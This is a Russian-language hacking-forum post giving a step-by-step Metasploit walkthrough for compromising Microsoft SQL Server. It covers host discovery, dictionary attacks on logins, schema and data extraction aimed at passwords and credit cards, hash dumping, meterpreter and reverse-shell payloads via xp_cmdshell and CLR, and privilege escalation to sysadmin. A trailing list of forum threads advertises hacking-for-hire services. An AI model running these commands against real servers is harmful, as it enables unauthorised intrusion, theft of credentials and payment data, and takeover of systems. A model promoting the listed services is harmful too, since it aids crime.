Интересно Взлом MSSQL

wrangler65

Original poster
Ufo Member
Сообщения
7
Реакции
1
Посетить сайт
В этой статье мы узнаем, как использовать Metasploit для эксплуатации MSSQL. Мы рассмотрим возможности Metasploit, от поиска MSSQL сервера в сети, до извлечения конфиденциальной информации из базы данных и получения контроля над системой.

Сбор информации и перечисление

При тестировании MSSQL серверов, в удаленной или локальной сети, наша первая задача — найти сервер в сети. Для этого мы будем использовать следующий модуль в Metasploit:

use auxiliary/scanner/mssql/mssql_ping
set rhosts 192.168.1.1/24
exploit
a31bd996-95f3-4ef9-86ad-3ff4255c9ca1.png
a31bd996-95f3-4ef9-86ad-3ff4255c9ca1.png

Мы нашли сервер, поэтому нашим следующим шагом будет получение учетных данных сервера. Для этого мы применим атаку по словарю:

use auxiliary/scanner/mssql/mssql_login
set rhosts 192.168.1.3
set user_file /root/users.txt
set verbose false
exploit
69a48139-5f1a-4263-aad5-485d941599a4.png
69a48139-5f1a-4263-aad5-485d941599a4.png

И вы можете видеть на изображении выше, у нас есть валидные учетные данные.

Получение версии MSSQL

Мы также можем получить всю информацию о сервере MSSQL и его версии:

use auxiliary/admin/mssql/mssql_sql
set rhosts 192.168.1.3
set username lowprwiv
set password Password@1
exploit
9b0b9274-36a0-4647-bdc5-9212d3b584c3.png
9b0b9274-36a0-4647-bdc5-9212d3b584c3.png

Давайте теперь изучим сервер и посмотрим, какую информацию мы можем получить. И для этого мы будем использовать следующий модуль:

use auxiliary/admin/mssql/mssql_enum
set rhosts 192.168.1.3
set username lowpriv
set password Password@1
exploit
c7b87978-4508-4b8a-b935-49be292a8228.png
c7b87978-4508-4b8a-b935-49be292a8228.png

В результате вы можете видеть, какие разрешения доступны, какие есть базы данных и прочую полезную информацию.

Перечисление пользователей SQL

Мы также можем получить список всех пользователей.

use auxiliary/admin/mssql/mssql_enum_sql_login
set rhosts 192.168.1.3
set username lowpriv
set password Password@1
exploit
6f0b4b66-24d2-4ac9-982c-633f7d828cb5.png
6f0b4b66-24d2-4ac9-982c-633f7d828cb5.png

Извлечение базы данных

Теперь давайте извлечем содержимое базы данных с помощью Metasploit.

use auxiliary/admin/mssql/mssql_findandsampledata
set rhosts 192.168.1.3
set username lowpriv
set password Password@1
set sample_size 4
set keywords FirstName|passw|credit
exploit
1cbb7aa9-d596-4821-aba3-a0731910f668.png
1cbb7aa9-d596-4821-aba3-a0731910f668.png

Таким образом, использование вышеперечисленного модуля вернет нам необходимое содержимое базы данных. Например, данные, которые мы извлекли, содержат информацию о хранящихся кредитных картах пользователей.

SchemaDump

Извлечение схемы сервера:

use auxiliary/scanner/mssql/mssql_schemadump
set rhosts 192.168.1.3
set username lowpriv
set password Password@1
exploit
1bcbd659-878c-40a6-92dc-83214b0d5790.png
1bcbd659-878c-40a6-92dc-83214b0d5790.png

Hashdump

Наш следующий модуль используется для выгрузки хешей пользователей с сервера. Чтобы использовать этот модуль, введите:

use auxiliary/scanner/mssql/mssql_hashdump
set rhosts 192.168.1.149
set username sa
set password Password@1
expoit
30cd9c36-aad5-4020-ba25-0d0c2502b81a.png
30cd9c36-aad5-4020-ba25-0d0c2502b81a.png

Выполнение команд (xp_cmdshell)

Теперь давайте попробуем получить сеанс meterpreter на сервере, эксплуатируя xpcmdshell с помощью:

use exploit/windows/mssql/mssql_payload
set rhosts 192.168.1.3
set username lowpriv
set password Password@1
exploit
4090f00a-b82a-4ca0-ac88-b72482f70f29.png
4090f00a-b82a-4ca0-ac88-b72482f70f29.png

Как видно на изображении выше, эксплойт пытается включить xp_cmdshell для получения нашей сессии. Как только xp_cmdshell успешно включится, у нас будет сессия meterpreter, как показано на изображении ниже:

bf8d9320-b5bb-4577-891c-20e479a6dca5.png
bf8d9320-b5bb-4577-891c-20e479a6dca5.png

MSSQl_exec

Теперь, если мы хотим выполнить команду на сервере, мы можем сделать это удаленно с помощью:

use auxiliary/admin/mssql/mssql_exec
set rhosts 192.168.1.3
set username lowpriv
set password Password@1
set cmd "net user"
exploit
0e4e48bf-08bc-4b9c-946f-7d3ed27f0b86.png
0e4e48bf-08bc-4b9c-946f-7d3ed27f0b86.png

CLR Assembely

Следующий эксплойт поможет воспользоваться интеграцией CLR. Этот эксплойт позволит активировать интеграцию CLR, а также включит свойство доверительной базы данных. После того как эксплойт предоставит вам сессию, он восстановит все настройки в их первоначальное состояние. Чтобы использовать этот эксплойт, введите:

use exploit/windows/mssql/mssql_clr_payload
set payload windows/x64/meterpreter/reverse_tcp
set username lowpriv
set password Password@1
exploit
b105294a-c27d-43e4-ba43-c3dacc9fc8d5.png
b105294a-c27d-43e4-ba43-c3dacc9fc8d5.png

Повышение привилегий

Когда у нас есть учетные данные пользователя, мы можем использовать следующий эксплойт для повышения привилегий нашего пользователя. Этот эксплойт будет манипулировать свойством доверительной базы данных и предоставит вам все необходимые привилегии.

use auxiliary/admin/mssql/mssql_escalate_dbowner
set rhosts 192.168.1.3
set username lowpriv
set password Password@1
exploit
c9f2d31d-622d-4765-8bbf-6a582cf9e1b5.png
c9f2d31d-622d-4765-8bbf-6a582cf9e1b5.png

Impersonation

Еще один метод получения привилегий — это олицетворение другого пользователя. И следующий эксплойт поможет нам сделать именно это. н позволит нашему пользователю выдавать себя за других пользователей для получения привилегий системного администратора. Чтобы использовать этот эксплойт, воспользуйтесь следующим набором команд:

use auxiliary/admin/mssql/mssql_escalate_execute_as
set rhosts 192.168.1.3
set username lowpriv
set password Password@1
exploit
a2c0bac5-152d-4d4f-b64e-cb101373ccba.png
a2c0bac5-152d-4d4f-b64e-cb101373ccba.png

Пользователь sa является членом sysadmin, и с помощью вышеуказанного эксплойта lowpriv теперь тоже стал системным администратором, так как он олицетворил пользователя sa.

Metasploit — это один из лучших инструментов для тестирования безопасности MSSQL-серверов, так как он предлагает много различных способов сканирования и эксплуатации.
 
Название темы
Автор Заголовок Раздел Ответы Дата
Support81 Гениальный взлом: Wi-Fi соседей становится ключом к корпоративным сетям Новости в сети 0
Support81 Взлом на подписке: создателю RedLine грозит 35 лет тюрьмы Новости в сети 0
Support81 100 миллионов жертв: взлом Change Healthcare сотрясает мир Новости в сети 0
Support81 Взлом тишины: RAMBO атакует самые защищенные системы за доли секунды Новости в сети 0
Support81 Сертификат на взлом: хакерам предложат выйти из подполья в России Новости в сети 0
T Без предоплаты! Взлом почты Mail.ru на заказ, взлом почты Рамблер, Взлом пароля Rambler.ru inbox.ru list.ru bk.ru internet.ru xmail.ru Ищу работу. Предлагаю свои услуги. 0
Support81 Взлом Schneider Electric: Hunt3r Kill3rs берут в заложники энергосистемы Германии Новости в сети 0
Support81 Взлом Dell: данные 49 млн клиентов оказались в сети Новости в сети 0
Support81 Взлом ООН: 8Base наносит мощный удар по борцам с неравенством Новости в сети 0
Support81 Инженер Amazon осужден за взлом и кражу $5 млн. Новости в сети 0
Support81 Токены Discord нарасхват: взлом Top.gg обернулся кошмаром для разработчиков Новости в сети 0
Support81 Взлом или небрежность? Код и пароли Binance были доступны на GitHub в течение нескольких месяцев Новости в сети 0
Support81 Взлом KyberSwap: математика помогла хакеру украсть $47 млн Новости в сети 0
Support81 Взлом криптобиржи Poloniex принёс ущерб в $100 млн. Новости в сети 0
eyegod Ожидает оплаты ✅Взлом/доступ мессенджеров,соц.сетей,почт,сайтов | Удаленный доступ | Очистка КИ/Информации из сети⚡ Ищу работу. Предлагаю свои услуги. 1
Support81 70 миллионов или 10 терабайт информации: чем обернется взлом TSMC для мира микросхем? Новости в сети 0
DOMINUS ЦБ России опроверг взлом систем украинскими хакерами Новости в сети 1
1 ВАйфай взлом Вопросы и интересы 2
W Заказать услуги Хакера,Взлом на заказ от [email protected] взлом базы данных,удаленный доступ (telegram,Viber,Whatsapp,Gmail,vk.com,OK.ru) Если Корзина 0
V ВЗЛОМ ЛЮБОЙ СЛОЖНОСТИ, ПОМОЩЬ ПРОГРАММИСТА Корзина 0
W Заказать услуги Хакера,Доступ до БД сайтов,Взлом Сайтов,Взлом на заказ от [email protected] -решение проблем по взлому. Корзина 0
B SERVICE HACKEP [email protected] Услуги Взлома на заказ,заказать услуги взлома,взлом на заказ,сервис взлома. 1. Взлом мессенджеров сообщений: Корзина 0
A Закрыто Пробив, поиск, взлом, флуд: Украина UA| EC | USA Корзина 1
K Взлом WiFi через Кали линукс с рут правами Вопросы и интересы 3
H Услуги взлома: ВК, WhatsApp, Viber, Instagram / E-mail / Взлом сайтов Корзина 0
A Пробив, взлом , диверсия Украина UA Ищу работу. Предлагаю свои услуги. 2
T Честный взлом почты mail.ru на заказ за 20$, взлом корпоративной почты, rambler Ukr.net Yahoo Ищу работу. Предлагаю свои услуги. 0
A ВЗЛОМ БАНКОВ В БРАЗИЛИИ !!!!!!! Предоставляю работу. Ищу специалиста. 0
L Взлом ВКонтакте на заказ от Фантомаса Ищу работу. Предлагаю свои услуги. 4
B Взлом электронной почты, без предоплаты. Ищу работу. Предлагаю свои услуги. 0
C Сервис по взлому-услуги хакера-заказать взлом на Заказ в [email protected] - Услуги Хакера. Приветствую участников форума! Станьте королем момента Ищу работу. Предлагаю свои услуги. 0
L Интересно Взлом мастер пароля firefox (key4.db) Бруты/Парсеры/Чекеры 0
A HackTheBox - взлом виртуальных машинын Omni и Доктор Полезные статьи 0
T Нужен взлом Київстар(україна) Предоставляю работу. Ищу специалиста. 1
D Оптовый взлом почты на заказ (цена 20$) Взлом почты Mail.ru Yandex.ru Rambler.ru Ищу работу. Предлагаю свои услуги. 0
A Интересно HackTheBox - взлом виртуальной машины Tabby Полезные статьи 0
H Аппаратный взлом жёсткого диска Корзина 0
W Интересно Массовый взлом роутеров. Уязвимости и взлом 2
A Интересно HackTheBox - взлом виртуальной машины Blunder Полезные статьи 1
V Взлом|Hack|HackMessenger|соц сети мессенджеры почты Корзина 0
ananda Интересно Взлом Wrapped LEO на сумму $42 000 Новости в сети 0
ananda Интересно Слив видеокурса ВЗЛОМ 4-В-1 2020 [exelab] Уязвимости и взлом 13
H Взлом без предоплат писать на [email protected]!,Ok.ru,WhatsApp на заказ! Не нужно писать в ЛС на форуме. Все контакты указаны ниже Пишите на поч Корзина 0
Admin Интересно Взлом BHF, карты раскрыты Новости в сети 21
B 100% взлом ВК! Ищу работу. Предлагаю свои услуги. 1
B Взлом почты mail.ru , rambler, yandex, корп.почт Ищу работу. Предлагаю свои услуги. 1
DOMINUS Проверено «EDEM CORP» Верификация / Восстановление (взлом) и пробив аккаунтов Госуслуг / Почты России и СДЭК (ID) для анонимного получения посылок Аккаунты/Админки/Документы 3
D взлом wi-fi курс бесплатно Другое 8
K Gmail взлом Предоставляю работу. Ищу специалиста. 1
H HackService(Услуги Взлома) [email protected] - решение проблем по взлому (Корпоративная,Viber,Whatsapp) 1. Взлом мессенджеров сообщений: 1.1 Взл Корзина 1

Название темы